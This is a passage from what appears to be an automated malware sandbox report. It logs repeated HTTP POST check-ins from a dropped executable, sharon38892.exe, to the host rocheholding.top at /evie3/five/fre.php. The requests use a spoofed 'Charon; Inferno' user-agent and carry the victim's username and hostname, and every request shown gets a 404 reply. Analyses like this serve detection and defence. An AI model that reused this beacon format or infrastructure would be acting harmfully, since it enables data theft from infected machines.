                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFrR3BxRKjgAQmUVkeufMyXsPt9hWiQr860vPXBEn35oPUs8UNZn9Of32pZCtKm3coRNVGu14pn%2BXp%2BqNClPSdhJ%2B76yJ%2BoEfABGOLos%2FACMnPvCe0uzO%2FU9kuaPl0kS3QKJ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870cfbf9df0f74-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      67192.168.2.2249231188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:50.061779022 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:50.115547895 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:50.904115915 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTIs7LpjtE8jTqjnu%2B1beGKp57OubuDqlqSTCsmjXRGHBQ%2FYDh%2BbaZl9yNUwZxWTi%2BaogCCPfTYQamPlwuK4lR54pwQMdxmh%2B8CYph2ebDeCGkD8BOEiV2mPyvHgXVmb%2FyT2"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d018814428e-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      68192.168.2.2249232188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:51.088057041 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:51.139714003 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:51.811686039 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=41lHOgF7T%2BC2VTWM40gWq9H65GbT5Zt7B5%2FPfNeis%2B9%2F5NEW0SSpBNpOeJA4G4FmKqr07FbyuaUV3GLfzxuvmtx6Ul7%2BsimO%2BB3NU2P%2BCBNcqAAfMQLSYSAryasT5vUZbVn0"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d07ee5978dc-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      69192.168.2.2249233188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:52.425127983 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:52.471481085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:53.175486088 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yee3ERWWGlPYfeqmfjp8TwWhUcvjd6bYjw0DAmb3%2BP9a9Xvk6JjpmSxpi%2Fvqe4ypJVokOMmlnzdwPyguPVdkuMmJRuSLdeZ278reG5aTepxHQraeFCupjmRmCSSHgA0jJcgz"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d103a3b4372-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      70192.168.2.2249234188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:53.400223017 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:53.452541113 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:54.152542114 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogDKa9Tkfrpjtgq99LBXic5sWzRgYUW0cxFEh21Iznvs7CEg5nVfEJ%2FLF6WLQsK4r8uKuvRQn8p2iU%2FQYMgiBcuKdY2CGSlYZ4gjH46ENB9A%2BTHgO0CFSAzvWlUYv%2Bgy%2BDpz"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d1679587c93-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      71192.168.2.2249235188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:54.312724113 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:54.368185043 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:55.058381081 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4SS3x%2BTEnZUHzwz5I3B%2FqM58zxp3iCF4yRuH8WVUsfyxbiJf7wUUewtKosGUZQDY7p88pTrsCBSJ36yvNoRpApahOWFX3kaxgU9n9jSZCukbJtwHpI15AS7rLdFLN9vKWCO"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d1c197b4356-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      72192.168.2.2249236188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:55.233505964 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:55.285542965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:55.949836969 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2t7agpthYpZsSs1OJ2EmRaQRcpQZFRNjPh%2FMITFUq06K2aOTSrqUA0XL%2F%2BFFXthkFlcNZvTo7SQXdzKfirFOovXQ%2FKfzGMjSvH3KFtWlKyDzeaA%2F5p7ROu6jBbQ%2FDAG%2FrIR"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d21bef44267-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      73192.168.2.2249237188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:56.093322992 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:56.147967100 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:56.761086941 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPXldfyHPVYKfuZMoru0TM0Kd4ogA%2BXZFEuOJPsZWsuqN2tgnDzqz1SRlXIspqj8G17hv4%2FLdtXfSkko8Ub8D%2Bzb4E7OhToEx2gNh5lm7SH9NJ7OduSWBdr0PmB07tFlEBmJ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d275c0a0f83-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      74192.168.2.2249238188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:56.909323931 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:56.960011005 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:57.642050982 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CD0XlmMg0akmKwEu%2FnYxZJ46xvR%2Fe0%2BQA2e%2BLMGjSzzqIATLEh3dlIWte7ZsXt3QamifcU4C3Bf7SkYw0n507MF5MzYJlhGbfQLytWSWRsh0JBjzgLO92oy8uFfv1D%2F%2BRnC%2B"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d2c4e3343ac-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      75192.168.2.2249239188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:57.792134047 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:57.851361990 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:58.415482044 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVZefb0749doZEApEOINIh9TrY%2FmkBT9IWdmUvlIajUgv%2BHMVSFxMznmeNpoAeMr2gcQLSTjZlGhs%2FfzRiiCbM1fclLvPogbiujXSa5IWClAjUX9dTWHusEzDGK64tvbzgy6"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d31cf134211-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      76192.168.2.2249240188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:58.594043016 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:58.643681049 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:59.363837957 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=diBRx518e7Jn8mqV%2B1PHrZaBef7EDwU%2B5FQolqDNb7rhNpuHE%2FwxePs%2BBz7KXV8hofRr8R3PI0odntczvv21IQAWEkJBLykPgLEv3to9zJ%2BLXW1%2FXLQXdDDuAgSMQvcHqwbh"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d36eded7ce7-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      77192.168.2.2249241188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:59.521470070 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:59.571789980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:00.269442081 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mh3Wy2WqvWAUs8KxgOxTtghleeEGlfHUHiBzGw52VEh6j76j0%2B6dH%2BC%2FUELUGy5raJTL00FfP56DLjum16hFm8yr5co8VsNZLetFGhV4KL77pvozlUob494Hy2JSkN05pK6O"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d3c9cc9187d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      78192.168.2.2249242188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:00.429820061 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:00.479760885 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:01.175054073 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMU1p337cSbx5Y6Gpjl8wMHUs%2FSBO5Laf1mrGFhKHbnBACpGeNgHF4p36cpcyYkZVpBAj66jyyrb6Wica1kY9TqE2%2F7q0wmFJxuMbyvrbipcbWGQ1%2BEyG9cLN4RKx5aXld7M"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d426d8cc3f0-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      79192.168.2.2249243188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:01.377448082 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:01.652162075 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:02.025820017 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Syj7tAuEIMCZqN2tRh11O3Qor8fEhbM%2BWRLcGRGnIRVGT%2Bv0yoKw%2Fxj8MOEvjT26tWQB21LO6eUIW5QTLuvRdNJufGAE0QgdZYkk%2FbewBBjKYCuYq1eUfWYTAMVxkjx3hBeT"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d483a1e18ae-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      80192.168.2.2249244188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:02.183840990 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:02.235493898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:02.953495026 CEST633INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpeDZrdwwPO2t5wEyH%2FoZoQYiLedwPvBwIOGgHDPqmSi%2FO%2B5f3uwH5PvEW6iepqHVde6CiC8gJWQXDR%2BtAXF6AWadttYmzYhIsYZnjzP7%2B70g3w9%2FcV6k%2F2%2Fp8vYgzBIDawA"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d4d6d7b43cb-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      81192.168.2.2249245188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:03.316992998 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
